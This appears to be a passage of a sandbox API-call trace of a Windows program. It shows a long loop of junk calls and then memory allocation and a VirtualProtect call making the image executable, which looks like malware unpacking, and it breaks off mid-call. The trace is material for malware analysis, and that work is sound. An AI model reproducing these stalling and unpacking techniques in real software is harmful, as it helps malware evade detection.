(lpString=0x0) returned 0x0 [0045.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.618] AddAtomA (lpString=0x0) returned 0x0 [0045.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.618] AddAtomA (lpString=0x0) returned 0x0 [0045.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.618] AddAtomA (lpString=0x0) returned 0x0 [0045.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.618] AddAtomA (lpString=0x0) returned 0x0 [0045.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.618] AddAtomA (lpString=0x0) returned 0x0 [0045.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.618] AddAtomA (lpString=0x0) returned 0x0 [0045.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.618] AddAtomA (lpString=0x0) returned 0x0 [0045.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.618] AddAtomA (lpString=0x0) returned 0x0 [0045.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.618] AddAtomA (lpString=0x0) returned 0x0 [0045.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.618] AddAtomA (lpString=0x0) returned 0x0 [0045.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.618] AddAtomA (lpString=0x0) returned 0x0 [0045.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.618] AddAtomA (lpString=0x0) returned 0x0 [0045.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.619] AddAtomA (lpString=0x0) returned 0x0 [0045.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.619] AddAtomA (lpString=0x0) returned 0x0 [0045.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.619] AddAtomA (lpString=0x0) returned 0x0 [0045.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.619] AddAtomA (lpString=0x0) returned 0x0 [0045.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.619] AddAtomA (lpString=0x0) returned 0x0 [0045.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.619] AddAtomA (lpString=0x0) returned 0x0 [0045.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.619] AddAtomA (lpString=0x0) returned 0x0 [0045.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.619] AddAtomA (lpString=0x0) returned 0x0 [0045.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.619] AddAtomA (lpString=0x0) returned 0x0 [0045.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.619] AddAtomA (lpString=0x0) returned 0x0 [0045.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.619] AddAtomA (lpString=0x0) returned 0x0 [0045.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.620] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.620] AddAtomA (lpString=0x0) returned 0x0 [0045.620] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.620] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.620] AddAtomA (lpString=0x0) returned 0x0 [0045.620] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.620] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.620] AddAtomA (lpString=0x0) returned 0x0 [0045.620] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.620] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.620] AddAtomA (lpString=0x0) returned 0x0 [0045.620] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.620] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.620] AddAtomA (lpString=0x0) returned 0x0 [0045.620] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.620] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.620] AddAtomA (lpString=0x0) returned 0x0 [0045.620] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.620] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.620] AddAtomA (lpString=0x0) returned 0x0 [0045.620] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.656] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.656] AddAtomA (lpString=0x0) returned 0x0 [0045.656] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.656] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.656] AddAtomA (lpString=0x0) returned 0x0 [0045.656] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.656] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.656] AddAtomA (lpString=0x0) returned 0x0 [0045.656] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.656] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.656] AddAtomA (lpString=0x0) returned 0x0 [0045.656] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.656] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.656] AddAtomA (lpString=0x0) returned 0x0 [0045.656] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.656] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.656] AddAtomA (lpString=0x0) returned 0x0 [0045.656] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.656] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.656] AddAtomA (lpString=0x0) returned 0x0 [0045.656] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.656] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.656] AddAtomA (lpString=0x0) returned 0x0 [0045.656] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.657] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.657] AddAtomA (lpString=0x0) returned 0x0 [0045.657] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.657] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.657] AddAtomA (lpString=0x0) returned 0x0 [0045.657] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.657] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.657] AddAtomA (lpString=0x0) returned 0x0 [0045.657] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.657] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.657] AddAtomA (lpString=0x0) returned 0x0 [0045.657] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.657] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.657] AddAtomA (lpString=0x0) returned 0x0 [0045.657] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.657] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.657] AddAtomA (lpString=0x0) returned 0x0 [0045.657] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.657] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.657] AddAtomA (lpString=0x0) returned 0x0 [0045.657] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.657] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.657] AddAtomA (lpString=0x0) returned 0x0 [0045.657] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.657] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.657] AddAtomA (lpString=0x0) returned 0x0 [0045.657] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.657] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.657] AddAtomA (lpString=0x0) returned 0x0 [0045.657] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.657] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.657] AddAtomA (lpString=0x0) returned 0x0 [0045.657] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.657] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.658] AddAtomA (lpString=0x0) returned 0x0 [0045.658] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.658] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.658] AddAtomA (lpString=0x0) returned 0x0 [0045.658] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.658] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.658] AddAtomA (lpString=0x0) returned 0x0 [0045.658] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.658] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.658] AddAtomA (lpString=0x0) returned 0x0 [0045.658] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.658] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.658] AddAtomA (lpString=0x0) returned 0x0 [0045.658] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.658] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.658] AddAtomA (lpString=0x0) returned 0x0 [0045.658] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.658] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.658] AddAtomA (lpString=0x0) returned 0x0 [0045.658] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.658] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.658] AddAtomA (lpString=0x0) returned 0x0 [0045.658] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.658] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.658] AddAtomA (lpString=0x0) returned 0x0 [0045.658] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.658] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.658] AddAtomA (lpString=0x0) returned 0x0 [0045.658] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.658] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.658] AddAtomA (lpString=0x0) returned 0x0 [0045.658] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.658] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.658] AddAtomA (lpString=0x0) returned 0x0 [0045.659] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.659] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.659] AddAtomA (lpString=0x0) returned 0x0 [0045.659] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.659] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.659] AddAtomA (lpString=0x0) returned 0x0 [0045.659] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.659] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.659] AddAtomA (lpString=0x0) returned 0x0 [0045.659] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.659] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.659] AddAtomA (lpString=0x0) returned 0x0 [0045.659] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.659] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.659] AddAtomA (lpString=0x0) returned 0x0 [0045.659] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.659] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.659] AddAtomA (lpString=0x0) returned 0x0 [0045.659] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.659] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.659] AddAtomA (lpString=0x0) returned 0x0 [0045.659] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.659] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.659] AddAtomA (lpString=0x0) returned 0x0 [0045.659] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.659] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.659] AddAtomA (lpString=0x0) returned 0x0 [0045.659] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.659] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.659] AddAtomA (lpString=0x0) returned 0x0 [0045.659] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.659] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.659] AddAtomA (lpString=0x0) returned 0x0 [0045.659] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.660] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.660] AddAtomA (lpString=0x0) returned 0x0 [0045.660] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.660] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.660] AddAtomA (lpString=0x0) returned 0x0 [0045.660] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.660] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.660] AddAtomA (lpString=0x0) returned 0x0 [0045.660] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.660] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.660] AddAtomA (lpString=0x0) returned 0x0 [0045.660] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.660] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.660] AddAtomA (lpString=0x0) returned 0x0 [0045.660] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.660] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.660] AddAtomA (lpString=0x0) returned 0x0 [0045.660] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.660] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.660] AddAtomA (lpString=0x0) returned 0x0 [0045.660] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.660] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.660] AddAtomA (lpString=0x0) returned 0x0 [0045.660] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.660] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.660] AddAtomA (lpString=0x0) returned 0x0 [0045.660] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.660] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.660] AddAtomA (lpString=0x0) returned 0x0 [0045.660] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.660] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.660] AddAtomA (lpString=0x0) returned 0x0 [0045.660] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.660] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.661] AddAtomA (lpString=0x0) returned 0x0 [0045.661] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.661] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.661] AddAtomA (lpString=0x0) returned 0x0 [0045.661] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.661] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.661] AddAtomA (lpString=0x0) returned 0x0 [0045.661] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.661] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.661] AddAtomA (lpString=0x0) returned 0x0 [0045.661] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.661] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.661] AddAtomA (lpString=0x0) returned 0x0 [0045.661] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.661] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.661] AddAtomA (lpString=0x0) returned 0x0 [0045.661] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.661] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.661] AddAtomA (lpString=0x0) returned 0x0 [0045.661] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.661] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.661] AddAtomA (lpString=0x0) returned 0x0 [0045.661] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.661] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.661] AddAtomA (lpString=0x0) returned 0x0 [0045.661] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.661] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.661] AddAtomA (lpString=0x0) returned 0x0 [0045.661] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.661] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.661] AddAtomA (lpString=0x0) returned 0x0 [0045.661] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.661] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.661] AddAtomA (lpString=0x0) returned 0x0 [0045.662] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.662] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.662] AddAtomA (lpString=0x0) returned 0x0 [0045.662] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.662] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.662] AddAtomA (lpString=0x0) returned 0x0 [0045.662] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.662] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.662] AddAtomA (lpString=0x0) returned 0x0 [0045.662] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.662] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.662] AddAtomA (lpString=0x0) returned 0x0 [0045.662] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.662] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.662] AddAtomA (lpString=0x0) returned 0x0 [0045.662] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.662] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.662] AddAtomA (lpString=0x0) returned 0x0 [0045.662] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.662] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.662] AddAtomA (lpString=0x0) returned 0x0 [0045.662] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.662] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.662] AddAtomA (lpString=0x0) returned 0x0 [0045.662] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.662] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.662] AddAtomA (lpString=0x0) returned 0x0 [0045.662] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.662] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.662] AddAtomA (lpString=0x0) returned 0x0 [0045.662] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.662] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.681] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0045.681] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0045.681] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0045.681] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0045.681] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersionExA") returned 0x76c33519 [0045.681] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0045.682] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0045.682] GetProcAddress (hModule=0x76c20000, lpProcName="SetErrorMode") returned 0x76c31b00 [0045.682] SetErrorMode (uMode=0x400) returned 0x0 [0045.682] SetErrorMode (uMode=0x0) returned 0x400 [0045.682] GetVersionExA (in: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}\x16w") | out: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0045.682] VirtualAlloc (lpAddress=0x0, dwSize=0x2d200, flAllocationType=0x1000, flProtect=0x4) returned 0x290000 [0045.685] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5d8 | 